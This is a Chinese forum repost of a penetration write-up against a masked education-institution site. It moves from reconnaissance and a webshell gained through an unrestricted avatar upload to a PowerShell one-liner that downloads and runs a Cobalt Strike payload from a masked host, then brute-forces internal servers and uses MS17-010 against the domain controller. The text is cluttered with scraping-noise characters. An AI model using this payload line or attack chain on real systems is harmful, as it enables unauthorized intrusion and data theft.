找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2316|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

9 M+ r. q( b* @: Y" m# H 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路- r0 h# I( Y5 H9 d+ j4 v1 Q6 r

1 ?: X* G3 T( _+ ?

+ z e, l* X/ o: h   6 H. m* J7 `, X/ f! s

( B4 |% g5 L1 x2 P0 b/ T5 k

2 i/ Z3 v( h1 {& P* s( N 正文. |1 }+ B( Y- e& K; g: Z

0 H6 O$ T& W0 Z4 A2 Q4 T" g

% n: _: `6 ^8 M0 m   7 `$ J* G7 b/ h3 r

) u6 u' z! c f8 \8 o" ?& k

* T: g/ t( Q3 B! d+ L; f% ~ 目标:www.xxxx.com(一家教育机构)
3 m% x$ | t$ M2 \9 A$ i6 J
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
" [( v- ]8 ?8 L' C) L

6 G1 X: U, Q+ i6 w1 f0 U

$ I* {- Y: ^" W) p vshapes=' ]+ g+ S! j5 [

5 y# }7 ]. R, X) S t5 R

2 _& u* a" d/ S0 j, }. @ 进行了简单的信息搜集
9 q* y3 q: G! ` D6 K( m" L
7 L* }9 E: R! [
# D* ~2 u; G; ?: y, S0 U0 q+ L

! P8 W! ^) z, m6 n

- C" J! o1 @/ v" V 子域名搜集6 G7 H: @+ i; x2 T7 G

* i- v8 c# W6 |6 n) g

' Z; y. v# o: [1 N vshapes=) [( ~7 p4 ~7 l" ?5 c

' x+ _% k9 B9 L" F* J, G

" f4 {* U/ d6 W2 h fofa找资产
, Z4 F. l+ }) V2 I
8 M6 } ]5 B% C+ O3 @" D
w) @; }; M( F7 k6 o1 j; Q: F

6 f& s) \- s' t6 b/ d& {

) T5 ~( k# {- l' | vshapes= + @4 |! ^( r7 E2 g

0 K$ y/ H, g: X. P n c9 B% v/ i

3 h+ L* `0 K# F9 M1 W 一共七个资产。去重之后只有两个。
, I: z9 r6 n E+ z! O. [! U
5 X, ^. s6 D0 ?3 u9 i0 {& H$ U
# Z1 i' L0 o1 H+ p$ E8 e

2 D4 P5 @0 Z' y9 c6 [

$ b& Y& C2 V6 I( M. i6 A& { 目录探测 ( A/ f; w7 E0 A& [3 z( R

! _ q3 o# F# M9 l7 {

7 q! j" u. k" r: ` vshapes= $ h J& L$ a0 |" W. I/ I

% F- N6 |& `# S

: ?5 b3 E: x/ M1 D4 g: f+ L$ I 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 r, l$ M6 [1 e) c9 }4 C
1 d2 R8 o3 B6 Q% T
4 K/ P+ d8 W# C+ p# z+ A

$ F; u A* K; R U; q1 {* F1 |

1 B3 k' A' ~% B! C1 K 我又尝试了通过修改返回包来绕过登录界面 & g7 v. ^! t1 O1 S, W

, A, k+ H# I3 W/ ]+ c) [# k( R9 k

( u$ `! Y% M; ]% U vshapes=% P/ u/ f7 Q& _

5 d$ G% P1 c. L% _! f& u6 ~

; s5 v, e e1 I6 w/ T# c: }4 D 还是不行,尝试注入无果 , x7 o5 N2 R C9 C' y9 n4 d" E

3 N) X4 A7 C. v# E5 W

3 p# k7 |# W# H ?" b" Y9 R vshapes= ( J8 |' H% |0 a$ r% f

6 k) U4 q' Q$ |1 b4 L4 d

# t c! @1 @9 Q/ i- ^8 P2 \( c1 u* v 不过我目录探测出了一处Spring信息泄露
5 T1 y( l" N& D; j/ Y7 H
# m- G' X# i' D# X7 J0 ]
! y. E. v9 _7 \, o5 ?

- W3 S1 n; m! a( F: p$ e

# J1 F" {3 F( f+ M vshapes=5 j, i( n) Q2 Z" E( x

" v7 T5 J! i( D! @0 _

9 _+ I$ R- \5 W1 s* ? 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录+ H2 d1 J/ j% s# h$ V; p

3 M# s: @8 {& @% X

# E0 G l) r) g3 `# W) Y5 P( W9 k7 b vshapes=* I+ K5 B- A$ w( H* \5 O! ?5 W z

+ C9 `$ d$ e% l' I$ j

( }0 y; w4 s( h5 }! _! t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 & B: |. I& R8 v

2 e9 h3 ?( B' u. R' Z1 e- q

% X3 H3 K, Y; d1 H0 q vshapes= 7 o, t/ [; n) M* h/ s4 I" W) e4 N3 m

; c( A# g" p7 f* \

; R# i4 i+ \- ~; T2 _ s9 R 获取有些师傅到这一步就手机抓包电脑测了。 3 ~4 N1 w1 S% b% p9 n4 d

7 ` A g3 F/ g: o) s

: C3 {% J' p9 z; A/ p3 b" T Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( D5 Z. P; w; r9 _3 ~) i

- j% |2 n2 P$ ^$ \5 I8 A4 E

3 l S7 X6 z1 x( [2 M 其中在一个公众号发现了小程序,可以进行注册。 - I8 s9 m3 G9 Y, o: k, b" B

4 a1 [/ S# ~ e+ O0 I6 P

% C8 A0 Z6 u" C0 F; N5 a 看到了头像上传,尝试上传获取WebShell" |0 ]* p) n9 m3 {/ N, J p4 I

! a7 ^% @' F) F# n; O

+ I0 R5 c$ S9 r: m! G. w# A, ` vshapes=7 u( ]3 W3 w) _- N4 U( R

7 f, @& ~) [1 m8 w

, k( U8 T( Z9 X0 G6 ~8 Y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 4 Q# A. |% M5 O; r7 I. s

& w7 o, K6 o0 }/ |0 i/ K

+ x a8 n9 G& C3 X vshapes=+ h- b) `5 ?$ e. v# X! ^: y6 Q/ A+ [

( s7 Y/ H* ~7 k6 H" @8 J

- z7 S0 S( c0 D# V; U 然后上了大马 ' w& p# Q7 E3 n+ ?$ Y8 |

; w' Q) S3 k8 Q

- d9 h3 \( P& G vshapes= ) T& l! t9 g9 W @0 k

/ K% T" L5 U( @0 [- I+ B2 S9 D

! r0 k2 ^: n0 e/ I8 O% C/ M vshapes=2 N* o6 g7 |; U+ |( W+ J

6 x' w7 }3 \7 W$ E, ]: w D

$ r% S7 D3 b+ k/ Q7 B: A) O3 W Z5 R 通过翻找文件发现数据库账号密码5 j5 f5 e1 S7 E$ h$ Z) }* j

; s, T' u2 g# a

z/ ]2 @; v% T vshapes=/ d9 l9 v, r' j1 ~5 M

7 V( Z( C. Y6 F, f- ~" t3 O e0 R6 _

f$ m" D5 [' a6 L$ G6 `. j --内网渗透 " E N1 o5 b2 m/ a5 P

+ K) \: q; r; A& n/ m5 Q2 B( ]- k0 ^

( Z+ A2 |( f4 w2 G 直接通过powershell执行 cs上线$ _3 w4 h$ h1 B' U0 m

& a5 |2 f" @6 n/ C) ~4 k( T

0 \. Q' E7 @# K4 \! |; [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" / q8 h; Z0 A" D, I* }# B

" [1 L5 h3 A& ^

9 q& r0 k5 v" }/ y4 [: } vshapes=& E4 j: ~" m- G% f, u

- } t; r, A2 r m" J

5 k0 Y$ S# i; Z: R 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 7 t5 R! l+ a& Y9 _1 U

6 Q$ ?4 ^ Q- w1 }

6 J7 u( N: t# Y( t: a vshapes= - R: F# A4 L# U8 q3 e1 t5 J

n# [6 g- ^4 C; [$ \+ H9 z

. q* @) O# V V2 y+ b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 e$ K {+ c8 \) i' {2 P! X; P" c3 E
4 c, B5 H& p }) z3 {, u
# K9 g8 a X& ~5 [
) Q( n4 j0 }+ E# t4 E. p! B9 G5 C4 S

4 N) u6 w1 z& ?2 N1 l1 u5 K

* G* A/ p5 B7 t* W7 h$ q, c vshapes= 1 G, T! P$ I/ ~* w

* D0 S' ~7 h% t/ ^0 X( j

h/ V. W6 t4 x/ G& [ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
6 r9 l r# D2 H; z/ g% a
2 m5 [: J1 ?' [" ]& f- x
% K. f" e0 _3 P$ b

6 m& }# q5 {, ?& M

4 }7 a( z ? ^5 Y vshapes=. e3 b3 `& g" [

0 ~0 b9 H7 z/ G" B+ y: Q( t+ l4 m" q

1 {' l# G9 ~% b7 {2 t$ N8 M
6 ]* L" W6 Z7 F) M) B
0 ], W2 F3 K" U; K4 Q+ D
" x# G8 A: l( K& u

" h) M3 `7 w. y

$ `) O" u/ Q1 s) C  4 H! o. ~) m3 ]1 ^# g

+ K( |7 j R8 c

, B% }4 f7 c: A. w2 @8 z2 ~ 小结- y6 q2 ~: `4 p4 p3 H

" a3 c- i {& G% I! J: |6 T

6 M$ v+ G( V( S- X; ^- B# S  0 Q- N9 `+ X% j$ u) c" p; i0 G

! D) t1 D! T: l

3 F0 ~4 u Z( _" m$ U 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 6 G0 G9 u# r2 g

% ~4 R( I& }; F- m- T

) l* _. s& l: ?  : m$ d! _$ ]1 Y0 h8 B5 g

+ f' h# x: s3 n1 M9 D
    + D! |# w6 v0 F1 c
  • ' [- u: _, q" g+ x; {; j  1 T. U! d; Y0 i$ x1 h- l
  • : O" W# L3 U5 C( o
  • : G2 u( F# j0 c/ _4 T/ D   , j1 P7 @5 ?2 H( P0 P
  • ( _: u4 Y9 U" h! M$ K
( Q4 Y' ?3 G3 Y) Y( f/ F

n/ c: n* X- U! h 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html ) U- @* Z S! {( L U. a" l/ R

J J# e) P9 S# ]+ E

( w0 j9 {7 s6 D" X: }- b  ' o, Y; Z# M/ v5 A9 @- U! U/ i7 C

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表